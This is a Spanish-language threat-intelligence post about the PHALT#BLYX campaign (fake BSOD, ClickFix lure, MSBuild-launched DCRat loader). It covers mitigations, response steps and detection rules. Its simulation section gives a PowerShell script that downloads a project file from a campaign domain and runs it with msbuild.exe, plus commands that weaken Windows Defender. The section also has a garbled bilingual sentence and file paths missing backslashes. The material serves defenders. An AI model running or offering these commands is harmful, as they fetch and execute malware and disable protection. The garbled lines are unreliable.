SOC Prime Bias: Medio

06 Jan 2026 16:06 UTC

Análisis de PHALT#BLYX: Falsos BSODs y Herramientas de Construcción Confiables en Cadenas de Malware

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Análisis de PHALT#BLYX: Falsos BSODs y Herramientas de Construcción Confiables en Cadenas de Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe detalla una cadena de intrusión de varias etapas que afecta al sector hotelero que combina una página de destino falsa de Booking.com, una animación engañosa similar a una pantalla azul y un mensaje estilo ClickFix para persuadir a los usuarios a ejecutar un dropper de PowerShell. Ese dropper recupera un archivo de proyecto MSBuild, que ejecuta un cargador DCRat personalizado. El cargador altera Windows Defender, establece persistencia utilizando un acceso directo de inicio .url e inyecta su carga útil en procesos legítimos. Al apoyarse en utilidades de life-off-the-land como PowerShell y MSBuild.exe, los operadores reducen las huellas evidentes de malware. También se observan artefactos en ruso en la cadena como una pista de atribución.

Investigación

Los investigadores de Securonix mapearon el flujo desde correos electrónicos de phishing que ofrecen enlaces de ‘cancelación de reservación’ hacia un dominio malicioso, luego hacia un comando de línea de PowerShell que localiza msbuild.exe, descarga un archivo v.proj y lo ejecuta. El proyecto v.proj realiza múltiples acciones: agrega exclusiones a Windows Defender, descarga staxs.exe (una variante de DCRat), crea un acceso directo de inicio .url para persistencia y se conecta a la infraestructura de comando y control por el puerto 3535. El cargador luego comprime e inyecta la etapa final en aspnet_compiler.exe, usando hollowing de proceso para mezclarse con actividad legítima.

Mitigación

Reduzca la exposición entrenando a los usuarios para reconocer mensajes estilo ClickFix y la ingeniería social de «ejecuta este comando para solucionar». Monitoree y restrinja la ejecución de MSBuild.exe, especialmente cuando se invoque desde rutas inusuales o flujos de trabajo dirigidos por el usuario, y habilite el registro de bloque de script de PowerShell para una mejor visibilidad. Añada detecciones para la creación de accesos directos .url en la carpeta de Inicio y para las modificaciones a las exclusiones de Windows Defender. En la capa de red, bloquee el tráfico saliente a los dominios maliciosos identificados y restrinja explícitamente o alerte sobre salidas sospechosas al TCP/3535 donde no sea requerido.

Respuesta

Si se detecta actividad, aísle el host y preserve los artefactos clave incluyendo v.proj, staxs.exe y cualquier archivo de acceso directo .url de Inicio. Elimine exclusiones no autorizadas de Defender, termine procesos maliciosos o inyectados, y bloquee los dominios/IPs asociados de C2, especialmente cualquier comunicación a través del puerto 3535. Restablezca credenciales potencialmente expuestas, ejecute un escaneo completo de malware y examine el entorno para patrones similares de ejecución de MSBuild y comandos de PowerShell. Finalmente, despliegue detecciones informadas por inteligencia de amenazas que se centren en el abuso de MSBuild, el comportamiento de ClickFix y la persistencia mediante accesos directos de Inicio para prevenir recurrencias.

Flujo de Ataque

Detecciones

Descargar o Cargar a través de Powershell (via cmdline)

Equipo de SOC Prime
06 Ene 2026

Cambios Sospechosos de Preferencias de Windows Defender (a través de powershell)

Equipo de SOC Prime
06 Ene 2026

Puntos de Posible Persistencia [ASEPs – Software / Colmena NTUSER] (a través de registry_event)

Equipo de SOC Prime
06 Ene 2026

Binarios / Scripts Sospechosos en Ubicación de Autoinicio (a través de file_event)

Equipo de SOC Prime
06 Ene 2026

IOCs (HashSha512) para detectar: Analizando PHALT#BLYX: Cómo se Usan Falsos BSODs y Herramientas de Construcción Confiables para Construir una Infección de Malware

Reglas AI de SOC Prime
06 Ene 2026

IOCs (SourceIP) para detectar: Analizando PHALT#BLYX: Cómo se Usan Falsos BSODs y Herramientas de Construcción Confiables para Construir una Infección de Malware

Reglas AI de SOC Prime
06 Ene 2026

IOCs (HashSha256) para detectar: Analizando PHALT#BLYX: Cómo se Usan Falsos BSODs y Herramientas de Construcción Confiables para Construir una Infección de Malware

Reglas AI de SOC Prime
06 Ene 2026

IOCs (DestinationIP) para detectar: Analizando PHALT#BLYX: Cómo se Usan Falsos BSODs y Herramientas de Construcción Confiables para Construir una Infección de Malware

Reglas AI de SOC Prime
06 Ene 2026

Ejecución de Carga Maliciosa PHALT#BLYX a través de MSBuild y Process Hollowing [Creación de Procesos de Windows]

Reglas AI de SOC Prime
06 Ene 2026

Campaña de Malware PHALT#BLYX Usando PowerShell y MSBuild para Infección [Powershell de Windows]

Reglas AI de SOC Prime
06 Ene 2026

Ejecución de Simulación

Prerrequisito: La Verificación Previa del Vuelo de Telemetría y Línea Base debe haber sido pasada.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa reflejan directamente los TTPs identificados y apuntan a generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa de Ataque y Comandos:
    El actor de amenaza abre una sesión de PowerShell en un punto final comprometido. Primero localizan el binario msbuild.exe, luego descargan un proyecto MSBuild malicioso ( binary, then download a malicious MSBuild project (v.proj) a C:ProgramData. El atacante invoca inmediatamente binario msbuild.exe, luego descargan un proyecto MSBuild malicioso ( para ejecutar la carga útil, que deja caer una segunda etapa. Finalmente, alteran Windows Defender agregando exclusiones y deshabilitando la monitorización en tiempo real para asegurar la persistencia.

  • Script de Prueba de Regresión:

    # Script de simulación PHALT#BLYX – reproduce la actividad que dispara la detección
    # --------------------------------------------------------------
    # 1. Localiza msbuild.exe
    $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName
    
    # 2. Descarga proyecto MSBuild malicioso a ProgramData
    $projUrl = "https://2fa-bns.com/v.proj"
    $dest    = "$env:ProgramDatav.proj"
    Invoke-WebRequest -Uri $projUrl -OutFile $dest
    
    # 3. Ejecuta el proyecto con msbuild.exe
    & $msb $dest
    
    # 4. Modifica configuraciones de Windows Defender (cualquiera de las siguientes satisfará la regla)
    #    Descomente las líneas deseadas para simular las acciones del atacante.
    
    # Añadir ruta de exclusión
    # Add-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Añadir exclusión para archivos .exe
    # Add-MpPreference -ExclusionExtension ".exe"
    
    # Añadir exclusión para archivos .ps1
    # Add-MpPreference -ExclusionExtension ".ps1"
    
    # Desactiva monitorización en tiempo real
    # Set-MpPreference -DisableRealtimeMonitoring $true
  • Comandos de Limpieza:

    # Elimina el archivo de proyecto dejado caer
    Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue
    
    # Restaura la monitorización en tiempo real de Windows Defender (si fue desactivada)
    Set-MpPreference -DisableRealtimeMonitoring $false
    
    # Elimina cualquier exclusión añadida (ejemplo para exclusión de ruta)
    Remove-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Opcionalmente elimina cualquier archivo restante creado por la carga
    # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue